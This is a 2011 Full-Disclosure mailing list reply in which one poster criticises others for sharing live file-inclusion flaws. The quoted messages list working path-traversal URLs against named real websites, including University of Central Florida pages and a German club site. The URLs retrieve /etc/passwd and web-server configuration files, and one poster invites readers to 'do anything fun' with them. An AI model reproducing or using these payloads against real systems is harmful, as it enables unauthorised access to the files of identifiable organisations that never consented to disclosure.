It sure as hell was not meant to be a place where children post links to sites with live LFI issues.
On Sat, Feb 19, 2011 at 4:58 AM, Friedrich Hausberger <fhausber...@gmail.com> wrote: > Is full disclosure a security mailing list, where I can find hacking > stuff or a magazine about > chat show? I hate pornography also, but this is the wrong way to publish. > > Here you have a LFI vuln I found by accident: > > http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd. > Feel free to download the whole Debian 4.0 Distribution. > > Most provider do not use jails/chroot or similar for their multi hosted > webserver. Nearly all providers are hackable under 3 days. > > Regards > > FHausberger > >> >> Message: 17 >> Date: Sat, 19 Feb 2011 01:08:56 -0500 >> From: Hack Talk<hacktalkb...@gmail.com> >> Subject: [Full-disclosure] University of Central Florida Multiple LFI >> To: full-disclosure@lists.grok.org.uk >> Message-ID: >> <AANLkTi=oyDpNL6Jgu8Ms=btlazdjukvyhfxxlh8vd...@mail.gmail.com> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Found these and thought I'd share: >> >> -==================- >> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 >> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 >> -==================- >> Let me know if you do anything fun with 'em >> >> Luis Santana - Security+ >> Administrator - http://hacktalk.net >> HackTalk Security - Security From The Underground >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> URL: >> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html >> >> ------------------------------ >> >> Message: 18 >> Date: Sat, 19 Feb 2011 16:34:21 +0530 >> From: Madhur Ahuja<ahuja.mad...@gmail.com> >> Subject: Re: [Full-disclosure] University of Central Florida Multiple >> LFI >> To: Hack Talk<hacktalkb...@gmail.com> >> Cc: full-disclosure@lists.grok.org.uk >> Message-ID: >> <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=s...@mail.gmail.com> >> Content-Type: text/plain; charset="utf-8" >> >> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 >> >> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkb...@gmail.com> wrote: >> >>> Found these and thought I'd share: >>> >>> -==================- >>> >>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 >>> >>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 >>> -==================- >>> Let me know if you do anything fun with 'em >>> >>> Luis Santana - Security+ >>> Administrator - http://hacktalk.net >>> HackTalk Security - Security From The Underground >>> >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> URL: >> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html >> >> ------------------------------ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> End of Full-Disclosure Digest, Vol 72, Issue 44 >> *********************************************** > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
